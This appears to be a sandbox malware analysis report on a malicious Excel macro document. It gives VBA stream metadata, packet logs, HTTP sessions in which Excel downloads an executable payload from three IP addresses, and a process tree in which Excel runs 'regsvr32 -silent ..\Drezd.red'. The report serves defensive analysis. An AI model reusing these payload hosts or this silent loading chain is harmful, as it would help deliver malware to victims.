      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
      File Type:data
      Stream Size:264
      Entropy:1.9985725068
      Base64 Encoded:False
      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
      Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
      File Type:data
      Stream Size:256
      Entropy:1.80540314317
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1047
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:data
      Stream Size:1047
      Entropy:6.66117755603
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . H c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
      Data Raw:01 13 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 cc 07 a0 48 63 06 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Sep 27, 2021 16:51:08.002849102 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:08.172470093 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:08.172586918 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:08.173515081 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:08.343935013 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.180974007 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.181061983 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.181123972 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.181138039 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.181170940 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.181176901 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.181185007 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.181231022 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.181286097 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.181333065 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.181360960 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.181404114 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.181430101 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.181441069 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.181464911 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.181530952 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.181535006 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.181550980 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.181612015 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.191946983 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.350279093 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350336075 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350399017 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.350466967 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350522995 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350527048 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.350610018 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.350615978 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.350686073 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350725889 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350756884 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.350774050 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350817919 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.350817919 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350857973 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350897074 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350935936 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.350974083 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.351011992 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.351048946 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.351094007 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.351093054 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.351180077 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.351186991 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.351190090 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.351246119 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.352690935 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.386759043 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.386816978 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.386857986 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.386878014 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.386897087 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.386903048 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.386915922 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.386936903 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.386984110 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.387453079 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.519133091 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519193888 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519218922 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519284010 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519306898 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519330978 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519398928 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.519402027 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519439936 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.519490004 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.519532919 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519674063 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.519808054 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519834995 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519859076 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519925117 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519927979 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.519949913 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519973993 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.519983053 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.519999981 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.520016909 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.520019054 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.520067930 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.520117044 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.520140886 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.520191908 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.520191908 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.520216942 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.520236015 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.520297050 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.524529934 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.592643976 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.592710018 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.592751026 CEST8049165190.14.37.178192.168.2.22
      Sep 27, 2021 16:51:09.592761040 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.592797995 CEST4916580192.168.2.22190.14.37.178
      Sep 27, 2021 16:51:09.592804909 CEST8049165190.14.37.178192.168.2.22

      HTTP Request Dependency Graph

      • 190.14.37.178
      • 185.183.96.67
      • 185.250.148.213

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249165190.14.37.17880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 27, 2021 16:51:08.173515081 CEST0OUTGET /44466.7022844907.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.178
      Connection: Keep-Alive
      Sep 27, 2021 16:51:09.180974007 CEST1INHTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 14:51:09 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7022844907.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.2249166185.183.96.6780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 27, 2021 16:51:11.602025032 CEST407OUTGET /44466.7022844907.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 185.183.96.67
      Connection: Keep-Alive
      Sep 27, 2021 16:51:11.850470066 CEST409INHTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 14:51:11 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7022844907.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.2249167185.250.148.21380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 27, 2021 16:51:12.323935032 CEST817OUTGET /44466.7022844907.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 185.250.148.213
      Connection: Keep-Alive
      Sep 27, 2021 16:51:12.594134092 CEST819INHTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 14:51:12 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7022844907.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP


      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: EXCEL.EXE PID: 2528 Parent PID: 596

      General

      Start time:16:51:13
      Start date:27/09/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13ffe0000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: regsvr32.exe PID: 2084 Parent PID: 2528

      General

      Start time:16:51:23
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd.red
      Imagebase:0xffb80000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 1928 Parent PID: 2084

      General

      Start time:16:51:23
      Start date:27/09/2021
